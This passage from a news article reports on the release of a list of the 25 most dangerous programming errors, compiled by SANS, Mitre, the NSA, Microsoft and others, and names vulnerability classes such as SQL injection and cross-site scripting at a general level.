ListsList of worst 25 programming errors ever Released

Leading organizations involved in software and software security — among them Microsoft, the NSA, the SANS Institute, and Mitre — have joined to issue a list of the top 25 most dangerous programming errors ever. Slip-ups on the part of software coders can result in costly thefts by hackers. The remedy: better education and more accountability.

Walaika Haskins writes in TechNewsWorld that a report issued Monday details the 25 most dangerous programming errors committed by software writers that result in security bugs and enable cyber espionage and cybercrime. The list was compiled by more than thirty experts from cyber security organizations in the U.S. and other countries. Experts from the Computer Emergency Response Team (CERT), the non-profit technology resource Mitre, the National Security Agency, and DHS’s National Cyber Security Division, Symantec, Microsoft, and the Japanese IPA, among others, named the errors, according to Mason Brown, director of the SANS Institute, which helped coordinate the project.

Haskins writes that just two of the errors alone led to more than 1.5 million Web site security breaches in 2008. These breaches, in turn, compromised the computers of people visiting those sites, turning the computers into so-called zombie machines, the report states. “[The mistakes] are huge. They are the underlying reason for almost all the patches we end up having to install on computers all over the world, and they enable the vast bulk of cybercrime and cyber espionage,” Alan Paller, director of research at the SANS Institute, told TechNewsWorld. “In one case in 2008, more than 1 million Web sites were penetrated and infected and made to infect their visitors’ computers — and those were trusted sites like the United Nations, state government and others. That was cause by errors 1 and 2 on the list,” he continued.

Topping the list are errors dubbed “Insecure Interaction Between Components.” The nine programming mistakes under this heading include: Improper input validation, improper encoding or escaping output, failure to preserve SQL query structure, a.k.a. SQL injection, and failure to preserve Web page structure aka cross-site scripting. “Some of the consequences can be very significant. For example, the ‘CWE-89: Failure to Preserve SQL Query Structure (a.k.a. SQL Injection)’ is a flaw that has been used to inject malicious code into many thousands of Web sites. The technique has been known for many years but was used extensively by hackers in 2008 to spread malicious software and spyware